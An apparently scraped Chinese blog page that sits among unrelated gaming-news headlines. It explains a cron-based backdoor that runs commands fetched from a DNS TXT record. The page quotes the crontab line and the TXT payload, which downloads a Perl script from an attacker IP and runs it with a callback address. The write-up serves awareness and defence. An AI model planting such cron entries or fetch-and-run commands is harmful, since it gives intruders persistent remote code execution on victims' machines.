GlareVPN使用日本在地伺服器‧日本本地IP位址,述不能訪問日本國內網站的情形將通通消失。  在《Hell Let Loose》裡體驗戰爭的殘酷現實   《Heavenly Bodies》美術設計解析(12 月 7 日推出)   Melty Blood 新作「MELTY BLOOD: TYPE LUMINA」上「Fate」Saber正式參戰!!   「Fate Project 大晦日TV Special 2021」放送決定!   「CAPCOM Pro Tour Online 2021」首場比賽於4月17日日本登場!   今年也辛苦了!funglr Games編輯部同仁的精選報導!   最強英雄登場!「龍族拼圖」×「一拳超人」聯乘決定!   Switch冬季新作情報大公開!任天堂發表會「Nintendo Direct 2021.9.24」懶人包 

使用 Cron 埋入後門 來執行 DNS 查詢的攻擊模式

商業

現在入侵機器後,攻擊模式越來越多元了,連要做什麼事情的程式(一般至少會寫要去哪抓程式),都不直接寫在裡面了...

使用 Cron 埋入後門 來執行 DNS 查詢的攻擊模式

平常安全性的檢查,比較不會去檢查 Cron,所以這次的攻擊手法就是把後門埋在 Cronjob 裡面,而且看起來就只是做 DNS 的查詢動作而已。

下述內容整理自此篇:Cronjob Backdoors

此攻擊手法是利用 Cronjob 埋入後門,定期依照 DNS TXT 的紀錄來遠端執行惡意程式。

手法步驟如下:

  1. crontab 埋入下述:
    0 1 * * * /bin/sh -c "sh -c $(dig logging.chat TXT +short @pola.ns.cloudflare.com)"
  2. 於 logging.chat 這個 Domain 的 DNS TXT 內容如下:
    "wget hxxp://89(.)248(.)171(.)3/h.pl -q -O /dev/shm/h.pl&&nohup perl /dev/shm/h.pl 66.172.27.225 80&disown"

於是就會每天在 1:00 的時候,自動抓取惡意程式來執行。

Tsung

隨機商業新聞

Addidas